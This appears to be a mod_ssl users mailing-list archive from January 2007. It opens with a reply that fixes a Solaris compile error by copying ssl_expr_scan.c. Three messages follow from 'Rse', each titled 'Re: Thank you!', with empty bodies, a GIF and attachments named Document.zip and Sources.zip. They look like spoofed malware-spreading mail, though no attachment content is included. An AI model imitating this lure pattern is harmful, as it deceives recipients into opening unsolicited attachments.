Received: from mta-m2.tc.umn.edu (mta-m2.tc.umn.edu [160.94.23.21])
	by master.modssl.org (Postfix) with ESMTP id 27C6514D843
	for ; Fri, 26 Jan 2007 20:58:38 +0100 (CET)
Received: from omwl587lap (gonzo.lib.umn.edu [128.101.98.73])
	by mta-m2.tc.umn.edu (UMN smtpd) with ESMTP
	for ; Fri, 26 Jan 2007 13:58:02 -0600 (CST)
X-Umn-Remote-Mta: [N] gonzo.lib.umn.edu [128.101.98.73] #+LO+TS+AU+HN
From: "Jeffrey M. Johnson" 
To: 
References: <8d0b863b0701261147r697c2a01jf0efadf963a5668f@mail.gmail.com>
In-Reply-To: <8d0b863b0701261147r697c2a01jf0efadf963a5668f@mail.gmail.com>
Subject: RE: solaris compIilation problem
Date: Fri, 26 Jan 2007 13:57:58 -0600
Message-ID: <008c01c74184$472d2d20$d5878760$@edu>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_008D_01C74151.FC92BD20"
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AcdBguzvXhS9bWEpTIaQoYnJU2LGpwAAPu1g
Content-Language: en-us
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeffrey M. Johnson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.

------=_NextPart_000_008D_01C74151.FC92BD20
Content-Type: text/plain;
	charset="windows-1250"
Content-Transfer-Encoding: 7bit

HYPERLINK
"http://forum.java.sun.com/thread.jspa?threadID=5089904"http://forum.java.su
n.com/thread.jspa?threadID=5089904

 

My solution is to  copy ./mod_ssl-2.8.28-1.3.37/pkg.sslmod/ssl_expr_scan.c
to ./apache_1.3.37/src/modules/ssl/ssl_expr_scan.c

 

Additionally I touch all the files in the ./apache_1.3.37/src/modules/ssl/
directory to get the current time and date stamp.

 

Jeff Johnson
Sr. Info. Tech. Prof.
Central Ops - University Libraries 

From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Michael Smith
Sent: Friday, January 26, 2007 1:47 PM
To: modssl-users@modssl.org
Subject: solaris compIilation problem

 

Good evening (well is is evening in my part of the world),

I am just in the process of attempting to upgrade from 

mod_ssl-2.8.25-1.3.34
to
mod_ssl-2.8.28-1.3.37

(along with upgrading openssl to the latest version) on solaris 2.9 with sun
cc.

I'm getting the following compilation error:

cc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 -DMOD_SSL=208128
-DEAPI -DNO_DL_NEEDED
-I/opt/apps/src/apache_perl/solaris/apache_1.3.37/src/modules/ssl
-I/opt/apps/rte- 1.1.6/include  `../../apaci` -DSSL_COMPAT -DSSL_ENGINE
-I/opt/apps/rte-1.1.6/include -DMOD_SSL_VERSION=\"2.8.28\" ssl_expr_scan.c
"lex.ssl_expr_yy.c", line 1900: syntax error before or at: 1
" lex.ssl_expr_yy.c", line 1901: warning: parameter mismatch: 1 declared, 0
defined
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer
combination: arg #1
"lex.ssl_expr_yy.c", line 1903: warning: improper pointer/integer
combination: arg #1 
"lex.ssl_expr_yy.c", line 1904: cannot recover from previous errors
cc: acomp failed for ssl_expr_scan.c
make[6]: *** [ssl_expr_scan.o] Error 2
make[5]: *** [all] Error 1


Any advice how to get round this? 

Many thanks

Michael



--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.17.12/653 - Release Date: 1/26/2007
11:11 AM


-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.17.12/653 - Release Date: 1/26/2007
11:11 AM
 

------=_NextPart_000_008D_01C74151.FC92BD20
Content-Type: text/html;
	charset="windows-1250"
Content-Transfer-Encoding: quoted-printable


















http://=
forum.java.sun.com/thread.jspa?threadID=3D5089904


 



My solution is to  copy =
./mod_ssl-2.8.28-1.3.37/pkg.sslmod/ssl_expr_scan.c
to ./apache_1.3.37/src/modules/ssl/ssl_expr_scan.c



 



Additionally I touch all the files in the =
./apache_1.3.37/src/modules/ssl/
directory to get the current time and date stamp.



 



Jeff =
Johnson

Sr. Info. Tech. Prof.

Central Ops - University Libraries =







From:=

owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On
Behalf Of Michael Smith

Sent: Friday, January 26, 2007 1:47 PM

To: modssl-users@modssl.org

Subject: solaris compIilation problem






 



Good evening (well =
is is
evening in my part of the world),



I am just in the process of attempting to upgrade from 



mod_ssl-2.8.25-1.3.34

to

mod_ssl-2.8.28-1.3.37



(along with upgrading openssl to the latest version) on solaris 2.9 with =
sun
cc.



I'm getting the following compilation error:



cc -c  -I../../os/unix -I../../include   -DSOLARIS2=3D290
-DMOD_SSL=3D208128 -DEAPI -DNO_DL_NEEDED
-I/opt/apps/src/apache_perl/solaris/apache_1.3.37/src/modules/ssl =
-I/opt/apps/rte-
1.1.6/include  `../../apaci` -DSSL_COMPAT -DSSL_ENGINE
-I/opt/apps/rte-1.1.6/include -DMOD_SSL_VERSION=3D\"2.8.28\"
ssl_expr_scan.c

"lex.ssl_expr_yy.c", line 1900: syntax error before or at: =
1

" lex.ssl_expr_yy.c", line 1901: warning: parameter mismatch: =
1
declared, 0 defined

"lex.ssl_expr_yy.c", line 1903: warning: improper =
pointer/integer
combination: arg #1

"lex.ssl_expr_yy.c", line 1903: warning: improper =
pointer/integer
combination: arg #1 

"lex.ssl_expr_yy.c", line 1904: cannot recover from previous =
errors

cc: acomp failed for ssl_expr_scan.c

make[6]: *** [ssl_expr_scan.o] Error 2

make[5]: *** [all] Error 1





Any advice how to get round this? 



Many thanks



Michael







--

No virus found in this incoming message.

Checked by AVG Free Edition.

Version: 7.5.432 / Virus Database: 268.17.12/653 - Release Date: =
1/26/2007
11:11 AM












--

No virus found in this outgoing message.

Checked by AVG Free Edition.

Version: 7.5.432 / Virus Database: 268.17.12/653 - Release Date: =
1/26/2007 11:11 AM

 


------=_NextPart_000_008D_01C74151.FC92BD20--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 27 17:01:41 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6252D14D85A; Sat, 27 Jan 2007 17:01:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id A3BA314D83F
	for ; Sat, 27 Jan 2007 17:01:40 +0100 (CET)
Date: Sat, 27 Jan 2007 11:13:36 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 30 16:02:50 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7BBFC14D85E; Tue, 30 Jan 2007 16:02:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id A5D3E14D83A
	for ; Tue, 30 Jan 2007 16:02:47 +0100 (CET)
Date: Tue, 30 Jan 2007 10:14:45 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 31 15:38:30 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E7CBE14D867; Wed, 31 Jan 2007 15:38:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 4C03A14D82F
	for ; Wed, 31 Jan 2007 15:38:29 +0100 (CET)
Date: Wed, 31 Jan 2007 09:50:35 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
